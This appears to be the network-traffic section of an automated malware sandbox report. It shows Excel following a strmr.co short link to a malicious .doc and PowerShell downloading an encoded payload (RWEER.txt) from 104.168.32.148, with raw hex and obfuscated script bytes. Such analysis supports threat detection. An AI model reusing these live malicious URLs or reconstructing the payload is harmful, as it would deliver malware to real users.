                                                                                                      Sep 27, 2024 12:51:44.948463917 CEST1236INData Raw: 00 7a 00 68 00 63 00 49 00 66 00 64 00 71 00 41 00 6d 00 70 00 63 00 6e 00 47 00 65 00 7a 00 22 00 0d 00 0a 00 62 00 4c 00 47 00 55 00 68 00 50 00 6c 00 43 00 47 00 43 00 70 00 4e 00 57 00 41 00 70 00 76 00 64 00 7a 00 4b 00 48 00 47 00 57 00 6d
                                                                                                      Data Ascii: zhcIfdqAmpcnGez"bLGUhPlCGCpNWApvdzKHGWmtTskfzUL = "CKKzLonoHpeLfPWdUWWLWbcbGxrLIum"LqzGoCKdsRZWZtkGijRjpsLBTLLrqfK =
                                                                                                      Sep 27, 2024 12:51:44.948668003 CEST1236INData Raw: 00 71 00 51 00 5a 00 7a 00 74 00 70 00 69 00 4a 00 43 00 7a 00 73 00 4c 00 69 00 68 00 4c 00 69 00 75 00 63 00 22 00 0d 00 0a 00 55 00 67 00 4c 00 73 00 4c 00 75 00 66 00 4b 00 76 00 41 00 69 00 4b 00 6b 00 6d 00 64 00 4b 00 4f 00 43 00 43 00 4b
                                                                                                      Data Ascii: qQZztpiJCzsLihLiuc"UgLsLufKvAiKkmdKOCCKoGZgiPAHusa = "bvHkdQlWPCokeKbfKOUUvLZAiecbikc"nLicdqZuxlmhffiGhmqWbBOiLhCPlpU
                                                                                                      Sep 27, 2024 12:51:44.948678017 CEST1236INData Raw: 00 20 00 22 00 4a 00 4e 00 65 00 47 00 57 00 6f 00 4c 00 57 00 4a 00 57 00 4b 00 75 00 70 00 71 00 66 00 68 00 49 00 7a 00 67 00 55 00 65 00 4b 00 48 00 69 00 63 00 57 00 4c 00 6e 00 57 00 66 00 50 00 22 00 0d 00 0a 00 78 00 57 00 50 00 54 00 4a
                                                                                                      Data Ascii: "JNeGWoLWJWKupqfhIzgUeKHicWLnWfP"xWPTJOCuAkLuKUlGGtLLfinOLrSzUUL = "qupsZOWWPPiZcffPptpPdWGfdPUChUf"CWAGbhGGpciiNbqk
                                                                                                      Sep 27, 2024 12:51:44.953325033 CEST1236INData Raw: 00 4e 00 63 00 49 00 66 00 4f 00 6c 00 7a 00 41 00 47 00 68 00 57 00 70 00 70 00 6b 00 47 00 67 00 5a 00 71 00 20 00 3d 00 20 00 22 00 63 00 65 00 55 00 43 00 6f 00 4e 00 52 00 55 00 57 00 52 00 69 00 41 00 4a 00 4b 00 5a 00 4b 00 57 00 68 00 78
                                                                                                      Data Ascii: NcIfOlzAGhWppkGgZq = "ceUCoNRUWRiAJKZKWhxLiNBAJKIQKKc"bmQZielWOcPUZLGdGGpkWoBkttfPmgP = "oLLRdcWBbPctKLHhKeZZGPhSBLUnim


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.2249174104.168.32.148804036C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 27, 2024 12:51:55.024710894 CEST77OUTGET /550/RWEER.txt HTTP/1.1
                                                                                                      Host: 104.168.32.148
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 27, 2024 12:51:55.493712902 CEST1236INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Sep 2024 10:51:55 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Fri, 27 Sep 2024 08:58:44 GMT
                                                                                                      ETag: "a1000-623160ff57940"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 659456
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: text/plain
                                                                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                      Sep 27, 2024 12:51:55.493740082 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                      Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                      Sep 27, 2024 12:51:55.493756056 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                      Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                      Sep 27, 2024 12:51:55.493769884 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                      Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                      Sep 27, 2024 12:51:55.493778944 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                      Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                      Sep 27, 2024 12:51:55.493784904 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                                                                      Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                                                                      Sep 27, 2024 12:51:55.493793964 CEST1236INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                                                                      Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                                                                      Sep 27, 2024 12:51:55.494344950 CEST1236INData Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
                                                                                                      Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
                                                                                                      Sep 27, 2024 12:51:55.494359016 CEST1236INData Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
                                                                                                      Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
                                                                                                      Sep 27, 2024 12:51:55.494374990 CEST1236INData Raw: 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a 44 77 6b 41 4d 45 41 41 41 42 67 45
                                                                                                      Data Ascii: UKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKP
                                                                                                      Sep 27, 2024 12:51:55.494390965 CEST1236INData Raw: 73 7a 41 36 38 76 4f 37 72 7a 39 36 4d 76 4f 6a 72 6a 7a 36 77 72 4f 79 71 44 71 36 77 6f 4f 39 70 6a 62 36 63 6d 4f 64 70 7a 55 36 6b 6b 4f 2f 6f 54 4e 36 49 51 4f 70 6e 7a 30 35 6f 62 4f 7a 6d 7a 70 35 41 61 4f 5a 6d 7a 62 35 55 57 4f 65 6c 7a
                                                                                                      Data Ascii: szA68vO7rz96MvOjrjz6wrOyqDq6woO9pjb6cmOdpzU6kkO/oTN6IQOpnz05obOzmzp5AaOZmzb5UWOelzV5AVOJlTF5sQOEgDz4UMOnizi4oHAAAAcAIAgAAAA5MbOsmDo5kZOOmzh58XOtlTX5YVOKlzQ5UTOukjJ5QROEgT/4EPOqjD34UNONjzu4sKOkiDm4EJODiDf4QHOidDs3M6NVejg3M3N/cTM3AyNLYzu24qNgaTj


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.2249163172.67.179.2154433208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-27 10:51:31 UTC321OUTGET /a9ifFT HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      UA-CPU: AMD64
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                      Host: strmr.co
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-09-27 10:51:32 UTC972INHTTP/1.1 302 Found
                                                                                                      Date: Fri, 27 Sep 2024 10:51:32 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 210
                                                                                                      Connection: close
                                                                                                      location: http://104.168.32.148/550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc
                                                                                                      strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                      vary: Accept-Encoding
                                                                                                      vary: Accept
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-dns-prefetch-control: off
                                                                                                      x-download-options: noopen
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-xss-protection: 0
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hTaOCdUiXThkdL9nQrZPvODAxeLE9KxMm36FrqZUq8i9iln33lYTivqiAPtgsdGu5mU5Y6Egpy8e9TNrbBvmvn2628NOWvZa84J27y%2BQSHZgzeoQy7ucm17pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8c9af0636e9843bf-EWR
                                                                                                      2024-09-27 10:51:32 UTC210INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 33 32 2e 31 34 38 2f 35 35 30 2f 65 64 2f 65 6e 77 65 67 65 74 62 61 63 6b 74 6f 65 6e 69 74 72 65 66 65 61 74 75 72 65 73 74 6f 75 6e 64 65 72 73 74 61 6e 64 68 6f 77 6d 75 63 68 67 72 65 61 74 73 68 65 69 73 76 65 72 79 63 75 74 65 72 67 69 72 6c 77 69 74 68 65 6e 74 69 65 72 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 61 6e 64 66 69 6e 65 66 6f 72 65 76 65 72 79 74 68 69 67 6e 67 65 74 62 61 63 6b 77 69 74 68 6e 65 77 73 79 73 74 65 6d 5f 5f 5f 5f 5f 5f 5f 76 65 72 79 6e 69 63 65 70 65 72 73 6f 6e 2e 64 6f 63
                                                                                                      Data Ascii: Found. Redirecting to http://104.168.32.148/550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.2249165104.21.64.884433528C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-27 10:51:34 UTC130OUTOPTIONS / HTTP/1.1
                                                                                                      User-Agent: Microsoft Office Protocol Discovery
                                                                                                      Host: strmr.co
                                                                                                      Content-Length: 0
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-09-27 10:51:34 UTC796INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Sep 2024 10:51:34 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      allow: GET,HEAD
                                                                                                      strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                      vary: Accept-Encoding
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-dns-prefetch-control: off
                                                                                                      x-download-options: noopen
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-xss-protection: 1; mode=block
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOnm5Hix23Dau8Yun%2B9mhJHri8O44xZXM2fKn8B43LpUj9sl9Nb8Kmeq9obGZtMxS1fdzHVg7Vmiz%2FfLoKLtlqdCJHydT1vGN6hRcCAPTCNG%2Fe4R8%2FlROrPEHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8c9af0742fd232dc-EWR
                                                                                                      2024-09-27 10:51:34 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                      Data Ascii: 8GET,HEAD
                                                                                                      2024-09-27 10:51:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.2249166104.21.64.884433528C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-27 10:51:36 UTC115OUTHEAD /a9ifFT HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                      Host: strmr.co
                                                                                                      2024-09-27 10:51:36 UTC1018INHTTP/1.1 302 Found
                                                                                                      Date: Fri, 27 Sep 2024 10:51:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 210
                                                                                                      Connection: close
                                                                                                      location: http://104.168.32.148/550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc
                                                                                                      strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                      vary: Accept-Encoding
                                                                                                      vary: Accept
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-dns-prefetch-control: off
                                                                                                      x-download-options: noopen
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-xss-protection: 1; mode=block
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e57i%2BrgQh6PDe%2BG7vJf6UYQjx6BlV3Gs8kIrAYMxEri8sTDRqEO%2Fg5NyG6rToHduC6Owx4YLsdz6rq7dS26P99IEv7f8CFQg2FyL5Rs5JuSYACyj1zi5VDz6xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8c9af07e9b0943be-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      3192.168.2.2249167172.67.179.215443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-27 10:51:40 UTC125OUTOPTIONS / HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                      translate: f
                                                                                                      Host: strmr.co
                                                                                                      2024-09-27 10:51:40 UTC794INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Sep 2024 10:51:40 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      allow: GET,HEAD
                                                                                                      strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                      vary: Accept-Encoding
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-dns-prefetch-control: off
                                                                                                      x-download-options: noopen
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-xss-protection: 1; mode=block
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=feTEuuiDgad8BWWmD6zOU40qu%2FAH7cDKXoryWWJ4fwms2hccykVlTAfyCaZt%2BFlx33bkXLvRNWWfenHWrd%2BZDHkht8gdUuzhpkFY5Pt9vqftVi1OdrpOnkapBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8c9af097fca1430e-EWR
                                                                                                      2024-09-27 10:51:40 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                      Data Ascii: 8GET,HEAD
                                                                                                      2024-09-27 10:51:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      4192.168.2.2249168172.67.179.215443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-27 10:51:41 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 74 72 6d 72 2e 63 6f 0d 0a 0d 0a
                                                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: strmr.co
                                                                                                      2024-09-27 10:51:41 UTC831INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 27 Sep 2024 10:51:41 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      content-security-policy: default-src 'none'
                                                                                                      strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                      vary: Accept-Encoding
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-dns-prefetch-control: off
                                                                                                      x-download-options: noopen
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-xss-protection: 1; mode=block
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yw39Eg2AjedQvQNaFnUkaqi8qNdKfnqcb0snPBg7%2FrmnVXmuuZKzrY8E1QBpyYtZ2hdTfMGl0xnnGAr6wwOmuwhZ1BKa6aKYCJM3e%2B6qIBDzV%2B0%2Bu3PXE2BAEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8c9af0a0485543f2-EWR
                                                                                                      2024-09-27 10:51:41 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                      Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                                                      2024-09-27 10:51:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      5192.168.2.2249169172.67.179.215443
                                                                                                      TimestampBytes transferredDirectionData
